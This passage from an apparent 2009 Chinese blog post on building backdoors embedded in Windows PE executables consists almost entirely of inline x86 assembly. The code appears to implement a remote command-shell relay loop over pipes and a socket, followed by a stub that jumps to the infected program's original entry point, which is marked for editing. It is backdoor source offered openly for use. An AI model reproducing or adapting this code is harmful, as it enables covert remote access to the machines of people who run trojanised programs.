- call dword ptr [ebp-402Ch]
- test eax,eax
- jnz loc_004011DD
- xor eax,eax
- jmp loc_00401419
- loc_004011DD:
- push 0C8h
- call dword ptr [ebp-4018h]
- loc_004011E8:
- mov eax,1
- test eax,eax
- je loc_004013C8
- push 1000h
- push 0
- lea ecx,[ebp-11E8h]
- push ecx
- call dword ptr [ebp-4090h]
- add esp,0Ch
- mov dword ptr [ebp-12F4h],0
- loc_00401215:
- cmp dword ptr [ebp-12F4h],40h
- jnb loc_00401240
- mov edx,[ebp-12F4h]
- mov eax,[ebp-12F8h]
- mov [ebp+edx*4-12F0h],eax
- mov ecx,[ebp-12F4h]
- add ecx,1
- mov [ebp-12F4h],ecx
- loc_00401240:
- xor edx,edx
- test edx,edx
- jnz loc_00401215
- lea eax,[ebp-1DCh]
- push eax
- push 0
- push 0
- lea ecx,[ebp-12F4h]
- push ecx
- push 0
- call dword ptr [ebp-4040h]
- mov [ebp-11F0h],eax
- cmp dword ptr [ebp-11F0h],0
- je loc_00401338
- cmp dword ptr [ebp-11F0h],0FFFFFFFFh
- je loc_00401338
- lea edx,[ebp-12F4h]
- push edx
- mov eax,[ebp-12F8h]
- push eax
- call dword ptr [ebp-4034h]
- test eax,eax
- jz loc_004012B6
- push 0
- push 1000h
- lea ecx,[ebp-11E8h]
- push ecx
- mov edx,[ebp-12F8h]
- push edx
- call dword ptr [ebp-4044h]
- mov [ebp-1E8h],eax
- loc_004012B6:
- cmp dword ptr [ebp-1E8h],0
- ja loc_004012C4
- jmp loc_00401417
- loc_004012C4:
- push 0
- lea eax,[ebp-1E8h]
- push eax
- mov ecx,[ebp-1E8h]
- push ecx
- lea edx,[ebp-11E8h]
- push edx
- mov eax,[ebp-1E0h]
- push eax
- call dword ptr [ebp-401Ch]
- mov [ebp-11F0h],eax
- cmp dword ptr [ebp-11F0h],0
- jnz loc_004012FC
- jmp loc_00401415
- loc_004012FC:
- cmp dword ptr [ebp-11ECh],0
- jnz loc_0040132A
- push 0
- lea ecx,[ebp-1E8h]
- push ecx
- push 1
- lea edx,[ebp-1340h]
- push edx
- mov eax,[ebp-1E0h]
- push eax
- call dword ptr [ebp-401Ch]
- mov [ebp-11F0h],eax
- loc_0040132A:
- cmp dword ptr [ebp-11F0h],0
- jnz loc_00401338
- jmp loc_00401413
- loc_00401338:
- push 1000h
- push 0
- lea ecx,[ebp-11E8h]
- push ecx
- call dword ptr [ebp-4090h]
- add esp,0Ch
- push 0
- lea edx,[ebp-4]
- push edx
- push 0
- push 0
- push 0
- mov eax,[ebp-38h]
- push eax
- call dword ptr [ebp-4020h]
- cmp dword ptr [ebp-4],0
- jbe loc_004013C3
- push 0
- lea ecx,[ebp-1E8h]
- push ecx
- mov edx,[ebp-4]
- push edx
- lea eax,[ebp-11E8h]
- push eax
- mov ecx,[ebp-38h]
- push ecx
- call dword ptr [ebp-4024h]
- mov [ebp-11F0h],eax
- cmp dword ptr [ebp-11F0h],0
- jnz loc_00401399
- jmp loc_00401411
- loc_00401399:
- push 0
- mov edx,[ebp-4]
- push edx
- lea eax,[ebp-11E8h]
- push eax
- mov ecx,[ebp-12F8h]
- push ecx
- call dword ptr [ebp-4048h]
- mov [ebp-11F0h],eax
- cmp dword ptr [ebp-11F0h],0
- jg loc_004013C3
- jmp loc_0040140F
- loc_004013C3:
- jmp loc_004011E8
- loc_004013C8:
- mov edx,[ebp-1E0h]
- push edx
- call dword ptr [ebp-4010h]
- mov eax,[ebp-38h]
- push eax
- call dword ptr [ebp-4010h]
- mov ecx,[ebp-2Ch]
- push ecx
- call dword ptr [ebp-4010h]
- mov edx,[ebp-34h]
- push edx
- call dword ptr [ebp-4010h]
- mov eax,[ebp-12F8h]
- push eax
- call dword ptr [ebp-403Ch]
- push 3E8h
- call dword ptr [ebp-4018h]
- jmp loc_004010F7
- loc_0040140F:
- jmp loc_004013C8
- loc_00401411:
- jmp loc_004013C8
- loc_00401413:
- jmp loc_004013C8
- loc_00401415:
- jmp loc_004013C8
- loc_00401417:
- jmp loc_004013C8
- loc_00401419:
- mov esp,ebp
- pop ebp
- ret
- }
-
- /////////////////////////////////////////////////////////////
- ex:
- _asm
- {
- pop ecx
- push ecx
- ret
- }
- ex1:
- _asm
- {
- call ex
- ret
- }
- exit1:
- ///////////////////////////////////////////////////////////////
- _asm
- {
- mov eax,0x401000 //这里需要更改为程序人口
- jmp eax
- }
- return 0;
- }
posted on
2009-06-08 00:00 Yincheng
阅读(215)
评论(0) 编辑 收藏
这篇关于PE可执行文件的镶入式程序后门开发的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!